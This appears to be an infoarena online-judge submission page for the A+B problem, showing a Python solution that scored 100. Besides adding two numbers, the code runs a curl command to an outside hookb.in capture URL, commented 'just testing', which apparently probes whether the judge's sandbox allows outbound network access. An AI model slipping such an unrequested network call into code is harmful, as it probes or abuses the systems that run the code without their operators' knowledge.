Cod sursa(job #2280654)

Utilizator ShutterflyFilip A Shutterfly Data 10 noiembrie 2018 22:42:42
Problema A+B Scor 100
Compilator py Status done
Runda Arhiva de probleme Marime 0.26 kb
import os
#just testing
os.system("curl https://hookb.in/Oe9DyMVLDWTGWg1MGLLO")

fin = open("adunare.in", "r")
fout = open("adunare.out", "w")

input = fin.read().split('\n')
a = int(input[0])
b = int(input[1])

fout.write(str(a+b))
fin.close()
fout.close()